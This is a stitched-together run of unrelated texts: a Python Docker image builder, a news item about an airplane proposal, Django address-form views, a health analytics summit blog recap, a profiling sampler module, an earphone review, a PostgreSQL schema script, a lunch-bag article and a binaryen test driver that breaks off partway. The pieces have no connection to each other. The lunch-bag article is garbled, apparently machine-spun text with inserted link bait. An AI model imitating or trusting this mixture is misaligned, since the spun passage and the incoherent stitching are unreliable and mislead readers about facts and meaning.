            for cmd_set in commands:
                if not cmd_set:
                    continue  # an empty RUN line would be invalid
                f.write("RUN %s\n" % (' && \\\n'.join(cmd_set)))
            success = final_commands.get("success")
            if success:
                f.write("RUN test -f %s && \\\n %s\n"
                        % (self.build_succeeded_file, ' && \\\n'.join(success)))
            fail = final_commands.get("fail")
            if fail:
                f.write("RUN test -f %s || \\\n %s\n"
                        % (self.build_succeeded_file, ' && \\\n'.join(fail)))
            always = final_commands.get("always")
            if always:
                f.write("RUN %s\n" % ' && \\\n'.join(always))
        return df

    def run(self, name=None, build_dir='.'):
        """Build every generated Dockerfile whose filename contains *name*
        (all of them when *name* is None), logging output to
        ``<dockerfile>.build.log``.
        """
        c = docker.Client(base_url='unix://var/run/docker.sock')
        for path in self.docker_files:
            if name and name not in path:
                continue
            try:
                # Recreate the build context directory with the Dockerfile
                # and the local conf.d tree.
                shutil.rmtree(path="%s/" % build_dir, ignore_errors=True)
                os.mkdir("%s/" % build_dir)
                shutil.copy(path, "%s/" % build_dir)
                shutil.copytree("conf.d", "%s/conf.d" % build_dir)
            except Exception as e:
                logging.error("Could not copy local content to destination build dir %s: %s",
                              build_dir, e)
                continue
            with open("%s.build.log" % (path), "w+") as out:
                response = c.build(path=build_dir, dockerfile=path,
                                   rm=False, pull=False, forcerm=False)
                for r in response:
                    out.write(r)
                    logging.info("%s: %s", path, r)


if __name__ == '__main__':
    bparser = argparse.ArgumentParser(description='Builder arguments.', add_help=True)
    bparser.add_argument("--conf", dest='conf', action='store',
                         type=argparse.FileType('r'), required=True,
                         help='Input config file.')
    bparser.add_argument("--build-dir", dest='build_dir', action='store', default=".",
                         help='Local directory where build process will run.')
    bparser.add_argument("--image", dest='image', action='store',
                         help='Build only images containing this substring.')
    args = bparser.parse_args()
    try:
        zb = zbuilder(config=args.conf)
        try:
            zb.run(name=args.image, build_dir=args.build_dir)
        except Exception as e:
            logging.error("Could not run build, name: %s: %s", args.image, e)
    except Exception as e:
        logging.error("Could not create zbuilder object: %s", e)
A video has shown the moment a man gave his girlfriend a huge surprise as he proposed to her. The proposal happened publicly inside an airplane during their flight from Warri to the city of Lagos. In the video, the man is seen standing in front of his woman while making use of a public address system to make the proposal so that everyone aboard can hear him. ‘I never believed in love until I found you,’ the man said to his girlfriend, who blushed shyly. He then went down on one knee and proposed to the woman to the huge admiration of the other passengers.
import logging

from django.contrib.gis.geoip2 import GeoIP2
from django.views.generic import FormView

from ipware.ip import get_real_ip

from .forms import AddressForm

# Initialize logger.
logger = logging.getLogger(__name__)


# Create your views here.
class AddressFormView(FormView):
    """Render and process an AddressForm, pre-selecting the country from
    the client's IP-derived location."""

    template_name = 'addresses/address_form.html'
    success_url = '/'

    def get_form(self):
        '''
        Get the Form object that will be supplied to the FormView's context.

        On an unbound (GET) form, the `country` field is pre-populated by
        geolocating the client's IP address.
        '''
        # Instantiate Form.
        form = AddressForm(**self.get_form_kwargs())

        # Determine the IP address associated to the HTTP Request.
        # get_real_ip returns None when no routable address can be found.
        ip_address = get_real_ip(self.request)

        # Populate the form's `country` field with the user's apparent
        # location. Skipped for bound forms so a submitted value is never
        # overwritten.
        # NOTE(review): GeoIP2() requires the GeoIP2 country database to be
        # configured (GEOIP_PATH); a lookup failure would raise here —
        # confirm this is acceptable for this deployment.
        if ip_address and not form.is_bound:
            geo_ip2 = GeoIP2()
            location = geo_ip2.country(ip_address)
            form.fields['country'].initial = location['country_code']

        return form


class ShippingAddressFormView(AddressFormView):
    """Address form that stores the result as the shipping address."""

    def form_valid(self, form):
        # Persist the validated address in the session for later checkout
        # steps.
        self.request.session['shipping_address'] = form.cleaned_data
        return super(ShippingAddressFormView, self).form_valid(form)


class BillingAddressFormView(AddressFormView):
    """Address form that stores the result as the billing address."""

    def form_valid(self, form):
        # Persist the validated address in the session for later checkout
        # steps.
        self.request.session['billing_address'] = form.cleaned_data
        return super(BillingAddressFormView, self).form_valid(form)
This is the first time I’ve had an opportunity to attend the Health Analytics Summit, and the second year that Health Catalyst has hosted it. The event took place at the Grand America Hotel, in Salt Lake City, Utah. I’d like to thank Health Catalyst for choosing this location as it was very well delivered with high attention to detail by very courteous hotel staff. Attendance was sold out at just over 900 people and the energy from everyone was palpable. Just listening to the comments from other attendees during the event, it was easy to see many people went home with new understandings and a better grasp on where we are in the healthcare analytics world. If I were to describe every keynote speaker in detail, and every takeaway from the breakout sessions, this would be more of a book, and less of a blog. I’ll lay out the most resonant points that stuck with me, although there were many, many more that my fellow Galeneers and attendees shared. Day one was started with a keynote speech by Health Catalyst’s CEO Dan Burton. The kickoff was a warm welcome and prepared everyone for the days ahead. Dan also detailed some of the findings that health systems are facing today and the lessons learned by many along the way as they become more data-driven enterprises. There is a shortage of analysts, resulting in a high demand for people with analytical thinking skills. Getting buy-in across the organization, from leadership and staff to providers and nursing professionals is the key to success in any data-driven endeavor. The second keynote speaker of the day was Daryl Morey, Houston Rockets GM and Managing Director of Basketball Operations. Daryl took us through his experience and success using data about players to find, recruit, train and enable players to become a serious force in the NBA. 
Using analytics, the Rockets were able to study the strengths and weaknesses of each player on the team and use those insights to beat the Lakers repeatedly even though the Lakers had the ability to recruit more highly paid players. Daryl even shared with us his history with analytics, starting in high school, including his year book photo. The presentation was heavy on details, but conveyed with some humor mixed in resulting in an overall fantastic delivery. In basketball the two for one principle was proven to be the best option when applying years of statistical data. It’s better to take two bad shots than one good shot, every day, every time, in every game. Managers disagree, but they shouldn’t be the ones making the call, it should be left to those in the game, in the precious seconds that it matters to make the shots. Data gives you confidence. When making decisions others will challenge, having data-driven insights to support your decision and help refute arguments. Be careful how you use the data. Build confidence and experience, it can be used incorrectly. Since I have a background in business management and an avid curiosity in different management styles, I found the next speaker to be fascinating and a very powerful speaker. My fellow Galeneers that attended the event all agree that Jim Collins (Author of Built to Last, Good to Great, and Great by Choice) was a potent speaker and left a lasting impression. In fact, many of Jim’s points resonated throughout the remainder of the summit. Jim’s team researched not simply what made a company great, but given the same circumstances, what differentiates two companies when one is successful and one fails. In healthcare, as in business, good isn’t enough. We have to be GREAT. Set your bhag (Big Hairy Audacious Goal) so big it’s humbling and perceptibly impossible. It does not have to be obtainable, but you must embrace the challenge with humility. 
Some of the best leaders in the largest companies in the world are not charismatic. Charisma does not define a great leader, instead it may cripple them with over confidence. Great leaders exhibit intelligence, hard work and humility. Don’t confuse values with practices. Harness the 20 mile march. Every day, every time, with relentless dedication and perseverance. I could go further into that keynote as it struck many chords within my soul. It motivated me to embrace humility and a healthy paranoia to take ideas and transform them into solutions although the journey will be grueling and will likely encounter opposition along the way. But I won’t. I’ll just say this, take an opportunity to read more about the 20 mile march and how that might apply to your current situation. The breakout sessions and round table discussions were very well thought out and offered a peek into the experiences many health systems had, including the troubles faced along the way and the various lessons learned. Some sessions were more about the technology and where we are going, and some were focused on past experience. Big data is not an easily definable term. Many health systems like to believe they have big data, but it turns out, it’s more or less average. Big data and the technology around it is coming. Right now, it’s being researched and many companies and systems are evaluating how it will work with long term goals. We should see it become more prevalent in the next three years. Value based care isn’t just a new payment model. It’s the right thing to do. Community hospitals face intense pressure and must embrace a data-driven culture to remain solvent and provide quality care for the people depending on them for a future. Data governance is best when applied throughout the entire organization, ensuring everyone has a stake and the power of data isn’t locked away or controlled by a single operating unit. 
Physicians need to be not only engaged, they need to be champions of data and best practices. Pushing cohorts and staff to do the right thing, every time, no matter the circumstances. One of the final keynote speakers was Ed Catmull (Co-founder of Pixar, President of Pixar and Walt Disney Animation Studios). This was a fascinating session as it focused primarily on the art. Like animation, science is an art. Deriving insights from data isn’t easy and it takes people with an analytical mindset to look at data and recognize trends and paint a picture of actionable insights from that data. Ed also focused on what he refers to as the “Brain Trust”, a group of people with various backgrounds that meet to solve a problem or set of problems. These brain trusts are designed and assembled for each problem and group of problems, and once the problem is solved, the brain trust is dissolved. This is something I have studied in depth and hearing how Pixar applied this methodology was very interesting. It’s easy to state your goals, it’s hard to stand to them. Protect the crew that works on a new idea that didn’t work, new ideas are fragile. Separate decision making from the creative process. If you give a good idea to a bad team, they will screw it up. If you give a bad idea to a good team they will fix it or throw it away and come up with a new idea. There is no silver bullet. It takes a lot of work, from every facet of every organization, every day, to be successful. And when you have become great, don’t stop. Keep improving.
# -*- coding: utf-8 -*- """ profiling.sampling.samplers ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2014-2017, What! Studio :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import import functools import signal import sys import threading import weakref import six.moves._thread as _thread from profiling.utils import deferral, Runnable, thread_clock __all__ = ['Sampler', 'ItimerSampler', 'TracingSampler'] INTERVAL = 1e-3 # 1ms class Sampler(Runnable): """The base class for samplers.""" #: Sampling interval. interval = INTERVAL def __init__(self, interval=INTERVAL): self.interval = interval class ItimerSampler(Sampler): """Uses ``signal.ITIMER_PROF`` to sample running frames. .. note:: ``signal.SIGPROF`` is triggeres by only the main thread. If you need sample multiple threads, use :class:`TracingSampler` instead. """ def handle_signal(self, profiler, signum, frame): profiler.sample(frame) def run(self, profiler): weak_profiler = weakref.proxy(profiler) handle = functools.partial(self.handle_signal, weak_profiler) t = self.interval with deferral() as defer: prev_handle = signal.signal(signal.SIGPROF, handle) if prev_handle == signal.SIG_DFL: # sometimes the process receives SIGPROF although the sampler # unsets the itimer. If the previous handler was SIG_DFL, the # process will crash when received SIGPROF. To prevent this # risk, it makes the process to ignore SIGPROF when it isn't # running if the previous handler was SIG_DFL. prev_handle = signal.SIG_IGN defer(signal.signal, signal.SIGPROF, prev_handle) prev_itimer = signal.setitimer(signal.ITIMER_PROF, t, t) defer(signal.setitimer, signal.ITIMER_PROF, *prev_itimer) yield class TracingSampler(Sampler): """Uses :func:`sys.setprofile` and :func:`threading.setprofile` to sample running frames per thread. It can be used at systems which do not support profiling signals. Just like :class:`profiling.tracing.timers.ThreadTimer`, `Yappi`_ is required for earlier than Python 3.3. .. 
_Yappi: https://code.google.com/p/yappi/ """ def __init__(self, *args, **kwargs): super(TracingSampler, self).__init__(*args, **kwargs) self.sampled_times = {} self.counter = 0 def _profile(self, profiler, frame, event, arg): t = thread_clock() thread_id = _thread.get_ident() sampled_at = self.sampled_times.get(thread_id, 0) if t - sampled_at < self.interval: return self.sampled_times[thread_id] = t profiler.sample(frame) self.counter += 1 if self.counter % 10000 == 0: self._clear_for_dead_threads() def _clear_for_dead_threads(self): for thread_id in sys._current_frames().keys(): self.sampled_times.pop(thread_id, None) def run(self, profiler): profile = functools.partial(self._profile, profiler) with deferral() as defer: sys.setprofile(profile) defer(sys.setprofile, None) threading.setprofile(profile) defer(threading.setprofile, None) yield
The SoundMagic E10C offers you great sound that is reasonably well balanced, with just the right amount of thump. You can rest assured that you are getting great per unit performance for every rupee you are investing. However, if we are to compare them to similarly priced IEMs, say for example the newly released Tekfusion Twinwoofers M2, then objectively, the Tekfusion Twinwoofers M2 is a slightly better buy in terms of pure audio performance. But the two are so close in their performance that you can almost substitute one for the other depending on which one is more easily available. Your decision can sway in favour of the SoundMagic E10C on ancillary factors too such as the availability of a computer adapter included in the bundle – if that’s an important consideration for you. Or even the three button remote as opposed to the single button one found on the Twinwoofers. The choice is simple. Though if you are still confused read on. We’ve been fans of SoundMagic’s E10 series for a long time now. In fact the E10 to us was a far better series than the overrated PL30s. The E10M was for a long time our go-to recommendation for the ₹2000 to ₹2500 price bracket. Soon the E10S came along with its dual wiring which would let you switch between iOS and Android button compatibility with the flick of a switch near the headphone jack. The E10S also improved on the flimsy cables that the E10M came with. Further with the M to S, there was also a slight change in the sound signature. Now, with the relatively recent release of the E10C, what’s changed? Let’s find out, starting with the look and feel. In terms of design, the driver housing looks exactly like the E10M while the cable is the one used on the E10S. The internal wiring is different though. The E10C has a 3-button remote that can automatically switch between Apple and Android smartphones – a pretty neat featyre and apparently a first in this space. 
It’s like they took the E10S and changed its cable to have a better remote and an angled input jack. The build quality is quite decent, something you'd expect from a headphone in this price range. Between the E10C and it’s predecessor the E10S there is no difference in sound signature. It’s the same vibrant signature that we’ve come to love over the ages (especially given that it comes at such an affordable price point). The question, therefore, isn’t which E10 sounds better (it’s the E10M in case you were wondering), the question is, how does the E10C compare to the other similarly priced IEMs we've reviewed recently. When we had the E10C with us, we also had the newly launched Tekfusion Twinwoofers M2. To put our in-ear headphones through their paces properly, we added a few more tracks to our standard mix in order to have a representation across genres. The tracks had a sampling rate of at least 96 kHz (some even 192 kHz when available) and a bit depth of 24 bits (as opposed to the standard bit depth of 16 bits) and were played through the Fiio X5 3rd gen player. With a fair amount of listening, we find that the locally designed Tekfusion Twinwoofers M2 inches ever so slightly ahead of the Japanese competition. The audio sounds crip, vibrant and surprisingly neutral (again with the caveat of "for this price point"). Ok so the Twinwoofer M2 is a little ahead in terms of pure audio performance. Does that mean the SoundMagic E10C is bad? Of course not! In fact, with the compatibility enhanced wiring and now three button remote it’s an improvement over the older version. The sound is great and some of the same problems like the recessed vocals and less finesse in the high end carry forward but they are minor niggles. You'd do well do pick these up. need a earphone compatible with gogear under 3.5k.
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""(Re)create the solomon_db analytics schema.

Connects to the local `solomon_db` database, enables the uuid-ossp
extension, drops any previous log tables and recreates them, committing
the whole schema in one transaction.
"""

import psycopg2
import sys

con = None
try:
    con = psycopg2.connect(host="localhost", dbname="solomon_db",
                           user="solomon_user", password="solomon")
    cur = con.cursor()

    # uuid-ossp supplies the UUID generation functions used for visitor ids.
    cur.execute('CREATE EXTENSION IF NOT EXISTS "uuid-ossp"')

    # Drop dependents first: log_websocket holds a foreign key into
    # log_visit, so dropping log_visit before log_websocket would make a
    # re-run of this script fail with a dependency error.
    cur.execute('DROP TABLE IF EXISTS log_websocket')
    cur.execute('DROP TABLE IF EXISTS log_visit')
    cur.execute('DROP TABLE IF EXISTS log_metrics')

    # One row per tracked visitor.
    cur.execute(r'''CREATE TABLE log_visit(visitor_number SERIAL NOT NULL,
        visitor_id UUID NOT NULL PRIMARY KEY,
        visitor_country TEXT NOT NULL,
        visitor_city TEXT NOT NULL,
        visitor_first_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
        visitor_last_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
        visitor_returning BOOLEAN NOT NULL,
        visit_count SMALLINT NOT NULL,
        referer_url TEXT,
        referer_keyword TEXT,
        config_os CHAR(10) NOT NULL,
        config_browser_name CHAR(15) NOT NULL,
        config_browser_version CHAR(20) NOT NULL,
        config_resolution CHAR(9) NOT NULL,
        location_ip CIDR
        )''')

    # One row per day; the bit array packs per-slot activity flags.
    cur.execute(r'''CREATE TABLE log_metrics(daily_date DATE NOT NULL PRIMARY KEY DEFAULT CURRENT_DATE,
        daily_bit_array BIT VARYING NOT NULL DEFAULT '0'
        )''')

    # One row per websocket use, linked back to the visitor.
    cur.execute(r'''CREATE TABLE log_websocket(websocket_use_id SERIAL NOT NULL PRIMARY KEY,
        visitor_id UUID NOT NULL REFERENCES log_visit(visitor_id)
        )''')

    con.commit()
except psycopg2.Error as e:
    # Roll back the partial transaction and exit non-zero instead of
    # letting the raw traceback escape.
    if con:
        con.rollback()
    sys.stderr.write('Database error: %s\n' % e)
    sys.exit(1)
finally:
    if con:
        con.close()
The Lunch Bag has actually been used by thousands globally dating to ages ago until today. Get further on a related encyclopedia - Click here: Personalized Wedding Favors Sharing Your Joy | Icarlygames. Via the years it has developed in to being a lot more functional in design that now we have lunch time bags that keep our food warm and even chilled. We discovered like us on facebook by browsing Bing. Lunch time bags accustomeded to be that aged brown paper bag and previously some individuals are still using this. The brownish paper bag provides the advantage of the holder being able to toss it when the contents have actually been cleared out. With the development of much better lunch time bags and the issue for the setting (since paper bags come from plants) the brownish paper lunch bag has taken a backseat in a lot of homes. We have so many available kinds of lunch bags that are currently swamping the marketplace. To get extra information, consider having a look at: company web site. They are available in a variety of layout and design. We have the soft lunch boxes that are either oblong or square in form usually made from either vinyl or plastic. We also have canvas lunch time bags made from cotton that is machine washable so it could be made use of repeatedly again. This allows us to conserve money for we no longer have to equip on lunch bags that are non reusable. These are extremely long lasting and we aid do away with the use of lots of paper or plastic bags. The protected lunch time bag would certainly be the most effective of them all. Whats fantastic regarding this is that it keeps meals fresh completely to the time when we consume them on lunch. As a result of this our meals does not obtain mushy and they try as if they were freshly prepared. These shielded bags may be made from nylon fabric although those in specialized materials like tapestry are likewise offered. 
Some shielded lunch bags even now come with these unique gel groups that are iced up then consisted of guaranteed with the food to keep it chilled. Kids will certainly delight in holding their lunch time bags to school with the different shades, styles, and layouts. You could discover lunch time bags with animation characters, animal designs and whatever designs that are very appealing to the younger generation. The wonderful point also is that there are great deals of lunch time bags that can be tailored. This aids steer clear of complication on having actually lunches mixed up which used to be issue with paper bags. Eating lunch time ought to be a satisfying meal. If you prefer your lunch meals to try as if its from mothers great old kitchen area obtain yourself an excellent lunch time bag..
#!/usr/bin/env python3
#
# Copyright 2015 WebAssembly Community Group participants
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Top-level test driver: each run_*_tests function below checks one
# binaryen tool/feature, reporting failures through the shared helpers.

import glob
import os
import subprocess
import sys
import unittest
from collections import OrderedDict

from scripts.test import binaryenjs
from scripts.test import lld
from scripts.test import shared
from scripts.test import support
from scripts.test import wasm2js
from scripts.test import wasm_opt


def get_changelog_version():
    """Parse and return the latest version number (as int) from CHANGELOG.md.

    A version heading is assumed to be a line containing a single token
    that starts with 'v', e.g. 'v101'; the first such line is the newest.
    """
    with open(os.path.join(shared.options.binaryen_root, 'CHANGELOG.md')) as f:
        lines = f.readlines()
    lines = [l for l in lines if len(l.split()) == 1]
    lines = [l for l in lines if l.startswith('v')]
    version = lines[0][1:]
    print("Parsed CHANGELOG.md version: %s" % version)
    return int(version)


def run_version_tests():
    """Check that every built executable reports the CHANGELOG version."""
    print('[ checking --version ... ]\n')
    # Files in the bin dir that are not runnable executables.
    not_executable_suffix = ['.txt', '.js', '.ilk', '.pdb', '.dll', '.wasm', '.manifest', 'binaryen-lit']
    bin_files = [os.path.join(shared.options.binaryen_bin, f) for f in os.listdir(shared.options.binaryen_bin)]
    executables = [f for f in bin_files if os.path.isfile(f) and not any(f.endswith(s) for s in not_executable_suffix)]
    executables = sorted(executables)
    assert len(executables)

    changelog_version = get_changelog_version()
    for e in executables:
        print('.. %s --version' % e)
        out, err = subprocess.Popen([e, '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
        out = out.decode('utf-8')
        err = err.decode('utf-8')
        assert len(err) == 0, 'Expected no stderr, got:\n%s' % err
        assert os.path.basename(e).replace('.exe', '') in out, 'Expected version to contain program name, got:\n%s' % out
        assert len(out.strip().splitlines()) == 1, 'Expected only version info, got:\n%s' % out
        parts = out.split()
        assert parts[1] == 'version'
        version = int(parts[2])
        assert version == changelog_version


def run_wasm_dis_tests():
    """Disassemble the checked-in .wasm binaries and compare to expectations."""
    print('\n[ checking wasm-dis on provided binaries... ]\n')
    for t in shared.get_tests(shared.options.binaryen_test, ['.wasm']):
        print('..', os.path.basename(t))
        cmd = shared.WASM_DIS + [t]
        if os.path.isfile(t + '.map'):
            cmd += ['--source-map', t + '.map']
        actual = support.run_command(cmd)
        shared.fail_if_not_identical_to_file(actual, t + '.fromBinary')

        # also verify there are no validation errors
        def check():
            cmd = shared.WASM_OPT + [t, '-all']
            support.run_command(cmd)

        shared.with_pass_debug(check)


def run_crash_tests():
    """Run wasm-opt on malformed inputs and expect a clean parse error."""
    print("\n[ checking we don't crash on tricky inputs... ]\n")
    for t in shared.get_tests(shared.get_test_dir('crash'), ['.wast', '.wasm']):
        print('..', os.path.basename(t))
        cmd = shared.WASM_OPT + [t]
        # expect a parse error to be reported
        support.run_command(cmd, expected_err='parse exception:', err_contains=True, expected_status=1)


def run_dylink_tests():
    """Verify that the dylink custom section is emitted first in the binary."""
    print("\n[ we emit dylink sections properly... ]\n")
    dylink_tests = glob.glob(os.path.join(shared.options.binaryen_test, 'dylib*.wasm'))
    for t in sorted(dylink_tests):
        print('..', os.path.basename(t))
        cmd = shared.WASM_OPT + [t, '-o', 'a.wasm']
        support.run_command(cmd)
        with open('a.wasm', 'rb') as output:
            index = output.read().find(b'dylink')
            print(' ', index)
            # offset 11 = 8-byte header + section id/size/name-length bytes
            assert index == 11, 'dylink section must be first, right after the magic number etc.'


def run_ctor_eval_tests():
    """Run wasm-ctor-eval using each test's .ctors list; compare to .out."""
    print('\n[ checking wasm-ctor-eval... ]\n')
    for t in shared.get_tests(shared.get_test_dir('ctor-eval'), ['.wast', '.wasm']):
        print('..', os.path.basename(t))
        ctors = open(t + '.ctors').read().strip()
        cmd = shared.WASM_CTOR_EVAL + [t, '-all', '-o', 'a.wat', '-S', '--ctors', ctors]
        support.run_command(cmd)
        actual = open('a.wat').read()
        out = t + '.out'
        shared.fail_if_not_identical_to_file(actual, out)


def run_wasm_metadce_tests():
    """Check wasm-metadce output (module and stdout) against expectations."""
    print('\n[ checking wasm-metadce ]\n')
    for t in shared.get_tests(shared.get_test_dir('metadce'), ['.wast', '.wasm']):
        print('..', os.path.basename(t))
        graph = t + '.graph.txt'
        cmd = shared.WASM_METADCE + [t, '--graph-file=' + graph, '-o', 'a.wat', '-S', '-all']
        stdout = support.run_command(cmd)
        expected = t + '.dced'
        with open('a.wat') as seen:
            shared.fail_if_not_identical_to_file(seen.read(), expected)
        shared.fail_if_not_identical_to_file(stdout, expected + '.stdout')


def run_wasm_reduce_tests():
    """Exercise wasm-reduce on fixed testcases and one fuzz-generated input."""
    if not shared.has_shell_timeout():
        print('\n[ skipping wasm-reduce testcases]\n')
        return

    print('\n[ checking wasm-reduce testcases]\n')
    # fixed testcases
    for t in shared.get_tests(shared.get_test_dir('reduce'), ['.wast']):
        print('..', os.path.basename(t))
        # convert to wasm
        support.run_command(shared.WASM_AS + [t, '-o', 'a.wasm', '-all'])
        support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec -all ' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm', '--timeout=4'])
        expected = t + '.txt'
        support.run_command(shared.WASM_DIS + ['c.wasm', '-o', 'a.wat'])
        with open('a.wat') as seen:
            shared.fail_if_not_identical_to_file(seen.read(), expected)

    # run on a nontrivial fuzz testcase, for general coverage
    # this is very slow in ThreadSanitizer, so avoid it there
    if 'fsanitize=thread' not in str(os.environ):
        print('\n[ checking wasm-reduce fuzz testcase ]\n')
        # TODO: re-enable multivalue once it is better optimized
        support.run_command(shared.WASM_OPT + [os.path.join(shared.options.binaryen_test, 'signext.wast'), '-ttf', '-Os', '-o', 'a.wasm', '--detect-features', '--disable-multivalue'])
        before = os.stat('a.wasm').st_size
        support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec --detect-features' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm'])
        after = os.stat('c.wasm').st_size
        # This number is a custom threshold to check if we have shrunk the
        # output sufficiently
        assert after < 0.85 * before, [before, after]


def run_spec_tests():
    """Run the upstream spec suite through wasm-shell, then round-trip each
    module through the binary format and re-check the expected output."""
    print('\n[ checking wasm-shell spec testcases... ]\n')

    for wast in shared.options.spec_tests:
        base = os.path.basename(wast)
        print('..', base)
        # windows has some failures that need to be investigated
        if base == 'names.wast' and shared.skip_if_on_windows('spec: ' + base):
            continue

        def run_spec_test(wast):
            # Run one .wast through the interpreter and return filtered output.
            cmd = shared.WASM_SHELL + [wast]
            output = support.run_command(cmd, stderr=subprocess.PIPE)
            # filter out binaryen interpreter logging that the spec suite
            # doesn't expect
            filtered = [line for line in output.splitlines() if not line.startswith('[trap')]
            return '\n'.join(filtered) + '\n'

        def run_opt_test(wast):
            # check optimization validation
            cmd = shared.WASM_OPT + [wast, '-O', '-all']
            support.run_command(cmd)

        def check_expected(actual, expected):
            # Compare interpreter output to the checked-in .log, if present.
            if expected and os.path.exists(expected):
                expected = open(expected).read()
                print(' (using expected output)')
                actual = actual.strip()
                expected = expected.strip()
                if actual != expected:
                    shared.fail(actual, expected)

        expected = os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log')

        # some spec tests should fail (actual process failure, not just assert_invalid)
        try:
            actual = run_spec_test(wast)
        except Exception as e:
            if ('wasm-validator error' in str(e) or 'parse exception' in str(e)) and '.fail.' in base:
                print('<< test failed as expected >>')
                continue  # don't try all the binary format stuff TODO
            else:
                shared.fail_with_error(str(e))

        check_expected(actual, expected)

        # skip binary checks for tests that reuse previous modules by name, as that's a wast-only feature
        if 'exports.wast' in base:  # FIXME
            continue

        # NOTE(review): this re-runs the interpreter with its result unused;
        # presumably a leftover — confirm against upstream before removing.
        run_spec_test(wast)

        # check binary format. here we can verify execution of the final
        # result, no need for an output verification
        # some wast files cannot be split:
        #     * comments.wast: contains characters that are not valid utf-8,
        #       so our string splitting code fails there
        # FIXME Remove reference type tests from this list after nullref is
        # implemented in V8
        if base not in ['comments.wast', 'ref_null.wast', 'ref_is_null.wast', 'ref_func.wast', 'old_select.wast']:
            split_num = 0
            actual = ''
            with open('spec.wast', 'w') as transformed_spec_file:
                for module, asserts in support.split_wast(wast):
                    print('    testing split module', split_num)
                    split_num += 1
                    support.write_wast('split.wast', module, asserts)
                    run_opt_test('split.wast')  # also that our optimizer doesn't break on it
                    result_wast_file = shared.binary_format_check('split.wast', verify_final_result=False, original_wast=wast)
                    with open(result_wast_file) as f:
                        result_wast = f.read()
                    # add the asserts, and verify that the test still passes
                    transformed_spec_file.write(result_wast + '\n' + '\n'.join(asserts))
            # compare all the outputs to the expected output
            actual = run_spec_test('spec.wast')
            check_expected(actual, os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log'))


def run_validator_tests():
    """Check wasm-as --validate modes accept/reject the expected inputs."""
    print('\n[ running validation tests... ]\n')
    # Ensure the tests validate by default
    cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
    support.run_command(cmd)
    cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
    support.run_command(cmd)
    # Web validation is stricter: these must now be rejected.
    cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
    support.run_command(cmd, expected_status=1)
    cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
    support.run_command(cmd, expected_status=1)
    # --validate=none must accept even an invalid return.
    cmd = shared.WASM_AS + ['--validate=none', os.path.join(shared.get_test_dir('validator'), 'invalid_return.wast'), '-o', 'a.wasm']
    support.run_command(cmd)
    cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_number.wast'), '-o', 'a.wasm']
    support.run_command(cmd, expected_status=1)


def run_example_tests():
    """Build and run the native C/C++ API examples against libbinaryen."""
    print('\n[ checking native example testcases...]\n')
    if not shared.NATIVECC or not shared.NATIVEXX:
        shared.fail_with_error('Native compiler (e.g. gcc/g++) was not found in PATH!')
        return
    # windows + gcc will need some work
    if shared.skip_if_on_windows('example'):
        return

    for t in shared.get_tests(shared.get_test_dir('example')):
        output_file = 'example'
        # NOTE(review): '-I<root>/t' looks odd next to the '-I<root>/src'
        # used below — confirm the 't' include path is intentional.
        cmd = ['-I' + os.path.join(shared.options.binaryen_root, 't'), '-g', '-pthread', '-o', output_file]
        if not t.endswith(('.c', '.cpp')):
            continue
        src = os.path.join(shared.get_test_dir('example'), t)
        expected = os.path.join(shared.get_test_dir('example'), '.'.join(t.split('.')[:-1]) + '.txt')
        # build the C file separately
        libpath = shared.options.binaryen_lib
        extra = [shared.NATIVECC, src, '-c', '-o', 'example.o',
                 '-I' + os.path.join(shared.options.binaryen_root, 'src'), '-g', '-L' + libpath, '-pthread']
        if src.endswith('.cpp'):
            extra += ['-std=c++' + str(shared.cxx_standard)]
        if os.environ.get('COMPILER_FLAGS'):
            for f in os.environ.get('COMPILER_FLAGS').split(' '):
                extra.append(f)
        print('build: ', ' '.join(extra))
        subprocess.check_call(extra)
        # Link against the binaryen C library DSO, using an executable-relative rpath
        cmd = ['example.o', '-L' + libpath, '-lbinaryen'] + cmd + ['-Wl,-rpath,' + libpath]
        print(' ', t, src, expected)
        if os.environ.get('COMPILER_FLAGS'):
            for f in os.environ.get('COMPILER_FLAGS').split(' '):
                cmd.append(f)
        cmd = [shared.NATIVEXX, '-std=c++' + str(shared.cxx_standard)] + cmd
        print('link: ', ' '.join(cmd))
        subprocess.check_call(cmd)
        print('run...', output_file)
        actual = subprocess.check_output([os.path.abspath(output_file)]).decode('utf-8')
        os.remove(output_file)
        shared.fail_if_not_identical_to_file(actual, expected)


def run_unittest():
    """Discover and run the Python unit tests under ./test."""
    print('\n[ checking unit tests...]\n')
    # equivalent to `python -m unittest discover -s ./test -v`
    suite = unittest.defaultTestLoader.discover(os.path.dirname(shared.options.binaryen_test))
    result = unittest.TextTestRunner(verbosity=2, failfast=shared.options.abort_on_first_failure).run(suite)
    shared.num_failures += len(result.errors) + len(result.failures)
    if shared.options.abort_on_first_failure and shared.num_failures:
        raise Exception("unittest failed")


def run_lit():
    """Run the lit-based test suite via the bundled binaryen-lit script."""
    def run():
        lit_script = os.path.join(shared.options.binaryen_bin, 'binaryen-lit')
        lit_tests = os.path.join(shared.options.binaryen_root, 'test', 'lit')
